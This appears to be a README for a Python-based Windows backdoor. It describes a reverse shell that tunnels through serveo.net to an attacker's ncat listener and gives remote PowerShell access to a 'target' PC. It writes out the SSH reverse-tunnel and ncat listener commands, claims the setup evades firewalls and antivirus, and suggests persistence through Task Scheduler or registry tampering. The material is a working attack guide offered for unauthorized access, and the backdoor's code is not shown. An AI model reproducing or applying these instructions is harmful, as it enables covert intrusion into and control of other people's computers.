This project is a Python-based Windows backdoor that, once executed on the target PC, establishes a connection to a remote server hosted on SERVEO at a specified TCP port. The server then forwards the connection to the attacker's system, successfully bridging communication between the attacker's machine and the target system. This connection grants unauthorized access to the target machine and provides a PowerShell command interface. Through this interface, the attacker can remotely execute PowerShell commands on the compromised system.
The best part for this is that this will work even if the firewall and antivirus are running, because all the communications are happening through an ssh tunnel.
- To get this to working a Tool must be installed on YOUR PC (attacker PC)
To be able to receive and interpret incoming backdoor as a PowerShell command line we should use 'Netcat'. Netcat, also known as Ncat, is a powerful networking tool used for reading and writing to network connections using TCP or UDP protocols.
sudo apt install ncat- This one commad is enough to set up ncat on linux
For WINDOWS Netcat comes With a networking tool called 'Nmap':
- Go to Nmap official site https://nmap.org/download.html#windows
- Download nmap installer and run it.
- CHECK Ncat at this window
- Continue the installation with default settings after this.
As mentioned already In order to receive connections from a public network we must have a public server capable of doing these things, for that 'serveo' is the best option. (it's an open source project )
- you can visit 'https://serveo.net' for more knowledge
Note
The 'SERVEO' service is often reported to experience prolonged periods of downtime.
Current :
ssh -R 61732:localhost:5555 serveo.net
- This command will connect port 5555 on our local machine to port 61732 on the public server 'serveo' , any TCP port between range (49152–65535) will work, change the port no if not available.
- Make sure the port number here (in this case 61732) is same as the port number on python code
REMINDER: you should keep a dedicated terminal open running this ssh command in order for this to work
After Successfull installation you should see like this when you run the command 'ncat' :
ncat -lnvp 5555 #the same local port that you specified in ssh commandExecute the command to start listening for connections :
While the python command is running on the target device connection will be established now you can start exceuting commands:
Tip
-
Remember do not leave the terminal inactive, the connection will be lost since the python code tries to reconnect every 120sec (this time delay can be modified in the code) when no activity is dectected.
-
If the terminal is stuck or not responding just close the current terminal and open new terminal and run the same ncat command, the python code is configured to try and reconnect if connection is closed.
-
You can configure the system to automatically startup the program on reboot. ON windows systems you can do this by using Task Scheduler or by tampering with registry.